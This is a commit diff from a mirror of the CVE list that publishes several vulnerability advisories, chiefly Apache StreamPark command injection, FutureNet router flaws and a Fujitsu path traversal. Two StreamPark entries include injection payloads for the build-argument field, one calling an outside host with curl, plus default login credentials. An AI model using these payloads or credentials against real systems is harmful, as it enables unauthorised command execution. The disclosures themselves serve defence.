admin/cvelist
1
0
Fork 0
mirror of https://github.com/CVEProject/cvelist.git synced 2025-07-30 18:04:30 +00:00
Code Issues Packages Projects Releases Wiki Activity

"-Synchronized-Data."

Browse Source
This commit is contained in:
CVE Team 2024-07-17 09:00:34 +00:00
parent 6b69d2891c
commit f9cba7dd6e
No known key found for this signature in database
GPG Key ID: BC5FD8F2443B23B7
7 changed files with 1070 additions and 26 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

69
2023/52xxx/CVE-2023-52291.json
View File

@ -1,18 +1,77 @@
{
"data_version": "4.0",
"data_type": "CVE",
"data_format": "MITRE",
"data_version": "4.0",
"CVE_data_meta": {
"ID": "CVE-2023-52291",
"ASSIGNER": "cve@mitre.org",
"STATE": "RESERVED"
"ASSIGNER": "security@apache.org",
"STATE": "PUBLIC"
},
"description": {
"description_data": [
{
"lang": "eng",
"value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided."
"value": "In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.\n\nBackground:\n\nIn the \"Project\" module, the maven build args\u00a0\u00a0\u201c<\u201d operator causes command injection. e.g : \u201c< (curl\u00a0 http://xxx.com )\u201d will be executed as a command injection,\n\nMitigation:\n\nall users should upgrade to 2.1.4,\u00a0 The \"<\" operator will blocked\u3002\n\n"
}
]
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-77 Improper Neutralization of Special Elements used in a Command ('Command Injection')",
"cweId": "CWE-77"
}
]
}
]
},
"affects": {
"vendor": {
"vendor_data": [
{
"vendor_name": "Apache Software Foundation",
"product": {
"product_data": [
{
"product_name": "Apache StreamPark (incubating)",
"version": {
"version_data": [
{
"version_affected": "<",
"version_name": "2.0.0",
"version_value": "2.1.4"
}
]
}
}
]
}
}
]
}
},
"references": {
"reference_data": [
{
"url": "https://lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkf",
"refsource": "MISC",
"name": "https://lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkf"
}
]
},
"generator": {
"engine": "Vulnogram 0.1.0-dev"
},
"source": {
"discovery": "UNKNOWN"
},
"credits": [
{
"lang": "en",
"value": "thiscodecc of MoyunSec Vlab and Bing"
}
]
}

69
2024/29xxx/CVE-2024-29737.json
View File

@ -1,18 +1,77 @@
{
"data_version": "4.0",
"data_type": "CVE",
"data_format": "MITRE",
"data_version": "4.0",
"CVE_data_meta": {
"ID": "CVE-2024-29737",
"ASSIGNER": "cve@mitre.org",
"STATE": "RESERVED"
"ASSIGNER": "security@apache.org",
"STATE": "PUBLIC"
},
"description": {
"description_data": [
{
"lang": "eng",
"value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided."
"value": "In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.\n\nMitigation:\n\nall users should upgrade to 2.1.4\n\nBackground info:\n\nLog in to Streampark using the default username (e.g. test1, test2, test3) and the default password (streampark). Navigate to the Project module, then add a new project. Enter the git repository address of the project and input `touch /tmp/success_2.1.2` as the \"Build Argument\". Note that there is no verification and interception of the special character \"`\". As a result, you will find that this injection command will be successfully executed after executing the build.\n\nIn the latest version, the special symbol ` is intercepted.\n\n"
}
]
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-77 Improper Neutralization of Special Elements used in a Command ('Command Injection')",
"cweId": "CWE-77"
}
]
}
]
},
"affects": {
"vendor": {
"vendor_data": [
{
"vendor_name": "Apache Software Foundation",
"product": {
"product_data": [
{
"product_name": "Apache StreamPark (incubating)",
"version": {
"version_data": [
{
"version_affected": "<",
"version_name": "2.0.0",
"version_value": "2.1.4"
}
]
}
}
]
}
}
]
}
},
"references": {
"reference_data": [
{
"url": "https://lists.apache.org/thread/xhx7jt1t24s6d7o435wxng8t0ojfbfh5",
"refsource": "MISC",
"name": "https://lists.apache.org/thread/xhx7jt1t24s6d7o435wxng8t0ojfbfh5"
}
]
},
"generator": {
"engine": "Vulnogram 0.1.0-dev"
},
"source": {
"discovery": "UNKNOWN"
},
"credits": [
{
"lang": "en",
"value": "L0ne1y"
}
]
}

294
2024/31xxx/CVE-2024-31070.json
View File

@ -1,17 +1,303 @@
{
"data_version": "4.0",
"data_type": "CVE",
"data_format": "MITRE",
"data_version": "4.0",
"CVE_data_meta": {
"ID": "CVE-2024-31070",
"ASSIGNER": "cve@mitre.org",
"STATE": "RESERVED"
"ASSIGNER": "vultures@jpcert.or.jp",
"STATE": "PUBLIC"
},
"description": {
"description_data": [
{
"lang": "eng",
"value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided."
"value": "Initialization of a resource with an insecure default vulnerability in FutureNet NXR series, VXR series and WXR series provided by Century Systems Co., Ltd. allows a remote unauthenticated attacker to access telnet service unlimitedly."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Initialization of a Resource with an Insecure Default"
}
]
}
]
},
"affects": {
"vendor": {
"vendor_data": [
{
"vendor_name": "Century Systems Co., Ltd.",
"product": {
"product_data": [
{
"product_name": "FutureNet NXR-1300 series",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 7.4.9 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-650",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 21.16.1 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-610X series",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 21.14.11 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-530",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 21.11.13 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-350/C",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 5.30.9 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-230/C",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 5.30.12 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-160/LW",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 21.8.3 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-G200 series",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 9.12.15 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-G180/L-CA",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 21.7.28B and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-G120 series",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 21.15.2 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-G110 series",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 21.7.30C and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-G100 series",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 6.23.10 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-G060 series",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 21.15.5 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-G050 series",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 21.12.9 and earlier"
}
]
}
},
{
"product_name": "FutureNet VXR/x64",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 21.7.31 and earlier"
}
]
}
},
{
"product_name": "FutureNet VXR/x86",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 10.1.4 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-1200",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 5.25.21 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-130/C",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 5.13.21 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-155/C series",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 5.22.5M and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-125/CX",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 5.25.7H and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-120/C",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 5.25.7H and earlier"
}
]
}
},
{
"product_name": "FutureNet WXR-250",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 1.4.7 and earlier"
}
]
}
}
]
}
}
]
}
},
"references": {
"reference_data": [
{
"url": "https://www.centurysys.co.jp/backnumber/nxr_common/20240716-01.html",
"refsource": "MISC",
"name": "https://www.centurysys.co.jp/backnumber/nxr_common/20240716-01.html"
},
{
"url": "https://www.centurysys.co.jp/backnumber/nxr_common/20240716-03.html",
"refsource": "MISC",
"name": "https://www.centurysys.co.jp/backnumber/nxr_common/20240716-03.html"
},
{
"url": "https://jvn.jp/en/vu/JVNVU96424864/",
"refsource": "MISC",
"name": "https://jvn.jp/en/vu/JVNVU96424864/"
}
]
}

294
2024/36xxx/CVE-2024-36475.json
View File

@ -1,17 +1,303 @@
{
"data_version": "4.0",
"data_type": "CVE",
"data_format": "MITRE",
"data_version": "4.0",
"CVE_data_meta": {
"ID": "CVE-2024-36475",
"ASSIGNER": "cve@mitre.org",
"STATE": "RESERVED"
"ASSIGNER": "vultures@jpcert.or.jp",
"STATE": "PUBLIC"
},
"description": {
"description_data": [
{
"lang": "eng",
"value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided."
"value": "FutureNet NXR series, VXR series and WXR series provided by Century Systems Co., Ltd. contain an active debug code vulnerability. If a user who knows how to use the debug function logs in to the product, the debug function may be used and an arbitrary OS command may be executed."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Active debug code"
}
]
}
]
},
"affects": {
"vendor": {
"vendor_data": [
{
"vendor_name": "Century Systems Co., Ltd.",
"product": {
"product_data": [
{
"product_name": "FutureNet NXR-1300 series",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 7.4.9 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-650",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 21.16.1 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-610X series",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 21.14.11 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-530",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 21.11.13 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-350/C",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 5.30.9 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-230/C",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 5.30.12 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-160/LW",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 21.8.3 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-G200 series",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 9.12.15 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-G180/L-CA",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 21.7.28B and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-G120 series",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 21.15.2 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-G110 series",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 21.7.30C and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-G100 series",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 6.23.10 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-G060 series",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 21.15.5 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-G050 series",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 21.12.9 and earlier"
}
]
}
},
{
"product_name": "FutureNet VXR/x64",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 21.7.31 and earlier"
}
]
}
},
{
"product_name": "FutureNet VXR/x86",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 10.1.4 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-1200",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 5.25.21 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-130/C",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 5.13.21 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-155/C series",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 5.22.5M and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-125/CX",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 5.25.7H and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-120/C",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 5.25.7H and earlier"
}
]
}
},
{
"product_name": "FutureNet WXR-250",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 1.4.7 and earlier"
}
]
}
}
]
}
}
]
}
},
"references": {
"reference_data": [
{
"url": "https://www.centurysys.co.jp/backnumber/nxr_common/20240716-01.html",
"refsource": "MISC",
"name": "https://www.centurysys.co.jp/backnumber/nxr_common/20240716-01.html"
},
{
"url": "https://www.centurysys.co.jp/backnumber/nxr_common/20240716-03.html",
"refsource": "MISC",
"name": "https://www.centurysys.co.jp/backnumber/nxr_common/20240716-03.html"
},
{
"url": "https://jvn.jp/en/vu/JVNVU96424864/",
"refsource": "MISC",
"name": "https://jvn.jp/en/vu/JVNVU96424864/"
}
]
}

294
2024/36xxx/CVE-2024-36491.json
View File

@ -1,17 +1,303 @@
{
"data_version": "4.0",
"data_type": "CVE",
"data_format": "MITRE",
"data_version": "4.0",
"CVE_data_meta": {
"ID": "CVE-2024-36491",
"ASSIGNER": "cve@mitre.org",
"STATE": "RESERVED"
"ASSIGNER": "vultures@jpcert.or.jp",
"STATE": "PUBLIC"
},
"description": {
"description_data": [
{
"lang": "eng",
"value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided."
"value": "FutureNet NXR series, VXR series and WXR series provided by Century Systems Co., Ltd. allow a remote unauthenticated attacker to execute an arbitrary OS command, obtain and/or alter sensitive information, and be able to cause a denial of service (DoS) condition."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "OS command injection"
}
]
}
]
},
"affects": {
"vendor": {
"vendor_data": [
{
"vendor_name": "Century Systems Co., Ltd.",
"product": {
"product_data": [
{
"product_name": "FutureNet NXR-1300 series",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 7.4.9 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-650",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 21.16.1 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-610X series",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 21.14.11 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-530",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 21.11.13 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-350/C",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 5.30.9 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-230/C",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 5.30.12 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-160/LW",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 21.8.3 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-G200 series",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 9.12.15 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-G180/L-CA",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 21.7.28B and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-G120 series",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 21.15.2 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-G110 series",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 21.7.30C and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-G100 series",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 6.23.10 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-G060 series",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 21.15.5 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-G050 series",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 21.12.9 and earlier"
}
]
}
},
{
"product_name": "FutureNet VXR/x64",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 21.7.31 and earlier"
}
]
}
},
{
"product_name": "FutureNet VXR/x86",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 10.1.4 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-1200",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 5.25.21 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-130/C",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 5.13.21 and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-155/C series",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 5.22.5M and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-125/CX",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 5.25.7H and earlier"
}
]
}
},
{
"product_name": "FutureNet NXR-120/C",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 5.25.7H and earlier"
}
]
}
},
{
"product_name": "FutureNet WXR-250",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "firmware version 1.4.7 and earlier"
}
]
}
}
]
}
}
]
}
},
"references": {
"reference_data": [
{
"url": "https://www.centurysys.co.jp/backnumber/nxr_common/20240716-01.html",
"refsource": "MISC",
"name": "https://www.centurysys.co.jp/backnumber/nxr_common/20240716-01.html"
},
{
"url": "https://www.centurysys.co.jp/backnumber/nxr_common/20240716-03.html",
"refsource": "MISC",
"name": "https://www.centurysys.co.jp/backnumber/nxr_common/20240716-03.html"
},
{
"url": "https://jvn.jp/en/vu/JVNVU96424864/",
"refsource": "MISC",
"name": "https://jvn.jp/en/vu/JVNVU96424864/"
}
]
}

58
2024/40xxx/CVE-2024-40617.json
View File

@ -1,17 +1,67 @@
{
"data_version": "4.0",
"data_type": "CVE",
"data_format": "MITRE",
"data_version": "4.0",
"CVE_data_meta": {
"ID": "CVE-2024-40617",
"ASSIGNER": "cve@mitre.org",
"STATE": "RESERVED"
"ASSIGNER": "vultures@jpcert.or.jp",
"STATE": "PUBLIC"
},
"description": {
"description_data": [
{
"lang": "eng",
"value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided."
"value": "Path traversal vulnerability exists in FUJITSU Network Edgiot GW1500 (M2M-GW for FENICS). If a remote authenticated attacker with User Class privilege sends a specially crafted request to the affected product, access restricted files containing sensitive information may be accessed. As a result, Administrator Class privileges of the product may be hijacked."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Path traversal"
}
]
}
]
},
"affects": {
"vendor": {
"vendor_data": [
{
"vendor_name": "Fujitsu Limited",
"product": {
"product_data": [
{
"product_name": "FUJITSU Network Edgiot GW1500 (M2M-GW for FENICS)",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "prior to V02L19C01"
}
]
}
}
]
}
}
]
}
},
"references": {
"reference_data": [
{
"url": "https://fenics.fujitsu.com/networkservice/m2m/download/update-m.html",
"refsource": "MISC",
"name": "https://fenics.fujitsu.com/networkservice/m2m/download/update-m.html"
},
{
"url": "https://jvn.jp/en/jp/JVN25583987/",
"refsource": "MISC",
"name": "https://jvn.jp/en/jp/JVN25583987/"
}
]
}

18
2024/41xxx/CVE-2024-41169.json Normal file
View File

@ -0,0 +1,18 @@
{
"data_type": "CVE",
"data_format": "MITRE",
"data_version": "4.0",
"CVE_data_meta": {
"ID": "CVE-2024-41169",
"ASSIGNER": "cve@mitre.org",
"STATE": "RESERVED"
},
"description": {
"description_data": [
{
"lang": "eng",
"value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided."
}
]
}
}